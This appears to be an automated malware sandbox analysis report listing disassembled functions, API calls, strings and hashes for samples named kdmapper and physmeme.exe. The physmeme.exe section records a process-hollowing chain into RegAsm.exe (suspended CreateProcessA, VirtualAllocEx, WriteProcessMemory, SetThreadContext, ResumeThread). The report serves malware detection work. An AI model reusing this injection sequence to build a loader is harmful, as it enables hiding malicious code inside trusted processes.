Part of subcall function 00E09097: TerminateProcess.KERNEL32(00000000), ref: 00E090C2

Strings

., xrefs: 00E0B4DB
*?, xrefs: 00E0B1FB

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: c54ab9f055ae1ae0ed3cac41ade5971608fedc4a2ec2f9c4c43848a112591c6d
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: 98519D71E0020AAFDF14DFA8C881AADBBF5FF58314F245169E844F7391E7759A418B50

Function 00DE75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE75E3

Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0

Part of subcall function 00DEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DE777F

Part of subcall function 00DEA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
Part of subcall function 00DEA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA532

Strings

:, xrefs: 00DE7654

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: ef8521668e767bf30a07a7c041c1efa3018ee4150c9a6670d7d4cc21e18e687c
Instruction ID: c4ce77baa50198a3336b3817f648e84988160f08fe2f7bb18299da0bdbce00b2
Opcode Fuzzy Hash: ef8521668e767bf30a07a7c041c1efa3018ee4150c9a6670d7d4cc21e18e687c
Instruction Fuzzy Hash: 28416271801198AAEB25FB65CC59EEEB77CEF55300F04809AB609A7092DB749F85CF70

Function 00DEB37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00DEB438
_wcschr.LIBVCRUNTIME ref: 00DEB478

Strings

*, xrefs: 00DEB38A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: 3d9bf66e4d4f6fce1a5934da1789656307f1b4dae49eb9a7affabd00498e0deb
Instruction ID: 83ee1b764665099ddfc15e8a7c05f7ce9d527920fe39f4a0734c217efc5ce304
Opcode Fuzzy Hash: 3d9bf66e4d4f6fce1a5934da1789656307f1b4dae49eb9a7affabd00498e0deb
Instruction Fuzzy Hash: 553114221043819ADB30BA578942A7B73E8DF90B3CB18801FF9C8571C3E766BD819671

Function 00DFB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DFB4E3
_wcslen.LIBCMT ref: 00DFB4FE

Strings

}, xrefs: 00DFB4D6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: c55aee577c97b85a9a1c2d34d9cf54ae3a643bf43d545d12a1f79dfc2cb0e742
Instruction ID: 891c000be67bacb16a09baa7ebe2c6052088e4487610dcf21a9ee6655ff053c3
Opcode Fuzzy Hash: c55aee577c97b85a9a1c2d34d9cf54ae3a643bf43d545d12a1f79dfc2cb0e742
Instruction Fuzzy Hash: EF21D17290430E5AD731AA64D845E7AB3DCDF91764F0A442BF680D3241EB69D98883B2

Function 00DFDDA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010420,00DFB270,?,?), ref: 00DFDE18

Strings

xz, xrefs: 00DFDE28
GETPASSWORD1, xrefs: 00DFDE0D

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xz
API String ID: 665744214-3234807970
Opcode ID: d859dde1b8587f9a69deec670844712867697a4e2b0155dce59a85c474b20e52
Instruction ID: 41cffaec4206c60176fa565e7adb18d09156188d11802f1c38269f56a3063ab7
Opcode Fuzzy Hash: d859dde1b8587f9a69deec670844712867697a4e2b0155dce59a85c474b20e52
Instruction Fuzzy Hash: A0110F72600258AFDB21EB35EC01BFF3796A755750F158065BE45BB080C6B49D89C774

Function 00DEF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00DEF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DEF2E4
Part of subcall function 00DEF2C5: GetProcAddress.KERNEL32(00E281C8,CryptUnprotectMemory), ref: 00DEF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00DEF33E), ref: 00DEF3D2

Strings

CryptProtectMemory failed, xrefs: 00DEF389
CryptUnprotectMemory failed, xrefs: 00DEF3CA

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 94ed1c0c4684d64a00e6d3b8835043bb2030c8bd3fe457dd7185c11b5e79874a
Instruction ID: ccbf58d3516d7e995364fcf5000d9a360b2f4106245731e7f2a7bf152a60512f
Opcode Fuzzy Hash: 94ed1c0c4684d64a00e6d3b8835043bb2030c8bd3fe457dd7185c11b5e79874a
Instruction Fuzzy Hash: FE1136326012A4AFDF21BF33DC01AAE3B54FF00B50B148166FC456B291CA70DD0186B0

Function 00DF101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00DF1160,?,00000000,00000000), ref: 00DF1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00DF108A

Part of subcall function 00DE6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE6C54

Part of subcall function 00DE6DCB: _wcschr.LIBVCRUNTIME ref: 00DE6E0A
Part of subcall function 00DE6DCB: _wcschr.LIBVCRUNTIME ref: 00DE6E19

Strings

CreateThread failed, xrefs: 00DF104F

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: 691daa7748ddc4f7d20acc8156198579aa17252eb82134e0fff0e23c059620b3
Instruction ID: 526c84f25a561ed84649cdc117a41a785746c01f6ed69b222dc478fafc0e9aa2
Opcode Fuzzy Hash: 691daa7748ddc4f7d20acc8156198579aa17252eb82134e0fff0e23c059620b3
Instruction Fuzzy Hash: 6D012BB934034DAFD3306E25AC41F767398EB50751F20406DF64662280CEA1A8844234

Function 00DEC058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00DEC080

Strings

?*<>|", xrefs: 00DEC06D, 00DEC07F
<9, xrefs: 00DEC076

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcschr
String ID: <9$?*<>|"
API String ID: 2691759472-2723886458
Opcode ID: b0f52637320a1971888aa3de3d4a2d9af19ea63216a63458be3f3d4abd089640
Instruction ID: 005939c6fc9133e9d4e6f17dc93ccf6fb3a9d36cc88ea28f539f80e64d69235e
Opcode Fuzzy Hash: b0f52637320a1971888aa3de3d4a2d9af19ea63216a63458be3f3d4abd089640
Instruction Fuzzy Hash: 8EF08153A65781C5C7303A2A9801772B3E8EFD5724F38281EE5C9972D2E6A188C28675

Function 00E0BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E097E5: GetLastError.KERNEL32(?,00E21030,00E04674,00E21030,?,?,00E03F73,00000050,?,00E21030,00000200), ref: 00E097E9
Part of subcall function 00E097E5: _free.LIBCMT ref: 00E0981C
Part of subcall function 00E097E5: SetLastError.KERNEL32(00000000,?,00E21030,00000200), ref: 00E0985D
Part of subcall function 00E097E5: _abort.LIBCMT ref: 00E09863

_abort.LIBCMT ref: 00E0BB80
_free.LIBCMT ref: 00E0BBB4

Strings

p, xrefs: 00E0BBAB

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p
API String ID: 289325740-2678736219
Opcode ID: 9c9193fee07ff54f5835d086dda99561b4c9ee6c3d3ae64fdfd6d217de6fc814
Instruction ID: b0768fba66819db8ab456b6683e54283736d8592f07c9490a5abc6f27e78f38a
Opcode Fuzzy Hash: 9c9193fee07ff54f5835d086dda99561b4c9ee6c3d3ae64fdfd6d217de6fc814
Instruction Fuzzy Hash: E901C431D006259FCB21AF6984016ADB7A0BF04724B19520AF864773D5CB706D81CFC1

Function 00DE1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00DEE2E8: _swprintf.LIBCMT ref: 00DEE30E
Part of subcall function 00DEE2E8: _strlen.LIBCMT ref: 00DEE32F
Part of subcall function 00DEE2E8: SetDlgItemTextW.USER32(?,00E1E274,?), ref: 00DEE38F
Part of subcall function 00DEE2E8: GetWindowRect.USER32(?,?), ref: 00DEE3C9
Part of subcall function 00DEE2E8: GetClientRect.USER32(?,?), ref: 00DEE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370

Strings

0, xrefs: 00DE1319

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 73e69a6fb673cab2601ff750b2f98f05ed9f81b2baff755a608771bd7b1c52aa
Instruction ID: 3f356b9934b464f9e2802fe608a99d1828f8dda310a80dfab2a21b3825bcf27f
Opcode Fuzzy Hash: 73e69a6fb673cab2601ff750b2f98f05ed9f81b2baff755a608771bd7b1c52aa
Instruction Fuzzy Hash: 43F0AF782043C8ABDF152FA28C0EBEA3B59AF41344F088314FD84609E1CB74CA95EA30

Function 00E08268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00E0BF30: GetEnvironmentStringsW.KERNEL32 ref: 00E0BF39
Part of subcall function 00E0BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E0BF5C
Part of subcall function 00E0BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E0BF82
Part of subcall function 00E0BF30: _free.LIBCMT ref: 00E0BF95
Part of subcall function 00E0BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E0BFA4

_free.LIBCMT ref: 00E082AE
_free.LIBCMT ref: 00E082B5

Strings

0", xrefs: 00E0829B

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0"
API String ID: 400815659-420201205
Opcode ID: bf8e4c5b50f87bf30583ab257471f39ab37ca7508c3a363fcbff541fb39d344c
Instruction ID: 2f4c652fa0b13dc4195ee77d2ac6890281a6f234c5016e149b4cced6fb091968
Opcode Fuzzy Hash: bf8e4c5b50f87bf30583ab257471f39ab37ca7508c3a363fcbff541fb39d344c
Instruction Fuzzy Hash: 02E02B33B16D5345D261327A3D0266F06844FC1338B54371AF690F70F3CE5088C344AA

Function 00DF0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00DF1206,?), ref: 00DF0FEA
GetLastError.KERNEL32(?), ref: 00DF0FF6

Part of subcall function 00DE6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00DF0FFF

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 0768d3abb35d5d7b590e5fa3de8d9e3b1168c85db44e95264a4e03a8ad83c041
Instruction ID: ae5c98b0b06f51adf4692600861a253eff927873896904d6cefc468c722c3770
Opcode Fuzzy Hash: 0768d3abb35d5d7b590e5fa3de8d9e3b1168c85db44e95264a4e03a8ad83c041
Instruction Fuzzy Hash: ACD02E72548230BAC6113736AC0ACBE3C04DB32B71F308764F138702E6CE208A8142B2

Function 00DEE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00DEDA55,?), ref: 00DEE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00DEDA55,?), ref: 00DEE2B1

Strings

RTL, xrefs: 00DEE2AB

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 4d97fb03262550a1035da24930eabb2fb00fc87bcc2c942ecc59dc372a80224c
Instruction ID: 740345ac1667a081e862c7a5402fef25c57e33be868b1881eeb21a4e565becd3
Opcode Fuzzy Hash: 4d97fb03262550a1035da24930eabb2fb00fc87bcc2c942ecc59dc372a80224c
Instruction Fuzzy Hash: 56C012316407506AE6302B767C0DBC36E985B04B15F09048CB241F95D1D6E5C5C486A0

Analysis Process: physmeme.exePID: 7252, Parent PID: 3804COMMON

Execution Graph

Execution Coverage:	39.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30%
Total number of Nodes:	20
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02F42129 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F4209B,02F4208B), ref: 02F42298
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F422AB
Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 02F422C9
ReadProcessMemory.KERNELBASE(00000088,?,02F420DF,00000004,00000000), ref: 02F422ED
VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 02F42318
WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 02F42370
WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 02F423BB
WriteProcessMemory.KERNELBASE(00000088,-00000008,?,00000004,00000000), ref: 02F423F9
Wow64SetThreadContext.KERNEL32(0000008C,014D0000), ref: 02F42435
ResumeThread.KERNELBASE(0000008C), ref: 02F42444

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02F42297
ResumeThread, xrefs: 02F42265
ress, xrefs: 02F421B3
aryA, xrefs: 02F4216F
CreateProcessA, xrefs: 02F421DD
GetP, xrefs: 02F421AB
Load, xrefs: 02F42167
TerminateProcess, xrefs: 02F42327
SetThreadContext, xrefs: 02F4224F
ReadProcessMemory, xrefs: 02F42216
GetThreadContext, xrefs: 02F42203
WriteProcessMemory, xrefs: 02F4223C
VirtualAlloc, xrefs: 02F421F0
VirtualAllocEx, xrefs: 02F42229

Memory Dump Source

Source File: 00000011.00000002.1340223346.0000000002F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2f41000_physmeme.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: de1377cdc85743ad089c05a4eac35317a439e25b7551f692dc9486d159c5ebdc
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 33B1E47664028AAFDB60CF68CC80BDA77A5FF88754F158524EA0CAB341D774FA41CB94

Function 014B0FDF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,03F43590,?,00000001,0000012C), ref: 014B1074

Strings

:>k~, xrefs: 014B101A

Memory Dump Source

Source File: 00000011.00000002.1340090834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_14b0000_physmeme.jbxd

Similarity

API ID: ProtectVirtual
String ID: :>k~
API String ID: 544645111-2710823188
Opcode ID: 05bc86d18fdf174b66a3b7234e7eb6f4a0c1d8a3ab133bd971bbccf0ec19906d
Instruction ID: 66c57506bd7a7569262e3f89685f46412eef967ed9c8bb26b45fa725166fe62a
Opcode Fuzzy Hash: 05bc86d18fdf174b66a3b7234e7eb6f4a0c1d8a3ab133bd971bbccf0ec19906d
Instruction Fuzzy Hash: 2D2128B5D05299AFDB01CF9AD880ACEFFB4FF49310F10815AE558A7211C3755905CFA1

Function 014B0510 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,03F43590,?,00000001,0000012C), ref: 014B1074

Strings

:>k~, xrefs: 014B101A

Memory Dump Source

Source File: 00000011.00000002.1340090834.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_14b0000_physmeme.jbxd

Similarity

API ID: ProtectVirtual
String ID: :>k~
API String ID: 544645111-2710823188
Opcode ID: 43984d0a258a21490108512ce5229a9cfa67842c9b4d45014e4e4d4ef479ad98
Instruction ID: da9f4e855fca1334ee1d9fd3961afbc03bfea0ec78138e86d53a3915a6041d7c
Opcode Fuzzy Hash: 43984d0a258a21490108512ce5229a9cfa67842c9b4d45014e4e4d4ef479ad98
Instruction Fuzzy Hash: 6D21FFB5D01259EFDB10CF9AD884ADEFBB4FB48310F10812AEA18A7250C375A954CFA5

